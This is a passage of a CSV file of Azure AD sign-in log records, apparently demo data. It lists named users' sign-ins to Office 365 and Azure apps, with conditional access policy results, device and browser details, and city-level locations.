Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f4c49c86-cb9e-4a04-9dcc-1dcdc36f1000,SigninLogs,Sucess,41.90428925,-85.99833679
+2034,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:50.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,650c50dc-6479-4b95-8f83-b8a51002dcaf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",429b44fe-fb38-41be-832c-f142a15f1000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,429b44fe-fb38-41be-832c-f142a15f1000,SigninLogs,Sucess,50.6406517,5.572050095
+2035,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ee18c426-42f0-428f-9126-489ab8a14e0d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",687149c8-f736-4452-b785-99f3d7211200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,687149c8-f736-4452-b785-99f3d7211200,SigninLogs,Sucess,33.7984581,-84.38828278
+2036,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fede0665-4c71-4bd3-9ad0-009ee94d339e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",687149c8-f736-4452-b785-99f3402a1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,687149c8-f736-4452-b785-99f3402a1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2037,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b58c6208-3745-40bc-8745-ecaa73bb1300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b58c6208-3745-40bc-8745-ecaa73bb1300,SigninLogs,Sucess,33.0175209,35.44601059
+2038,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b58c6208-3745-40bc-8745-ecaa73bb1300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b58c6208-3745-40bc-8745-ecaa73bb1300,SigninLogs,Sucess,33.0175209,35.44601059
+2039,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:16.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1b57aee4-5a35-498d-99c5-445bb33865ac,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c3a7ae11-3090-46d7-95b6-d20567201200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c3a7ae11-3090-46d7-95b6-d20567201200,SigninLogs,Sucess,33.7984581,-84.38828278
+2040,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:36.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f565726c-3dbf-4173-957b-c0b794078a93,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3f80e775-4028-4bc5-9e8b-649bee761000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3f80e775-4028-4bc5-9e8b-649bee761000,SigninLogs,Sucess,33.7984581,-84.38828278
+2041,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:57.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e4d2d351-7347-45d4-a860-279daa019a56,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda845b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan 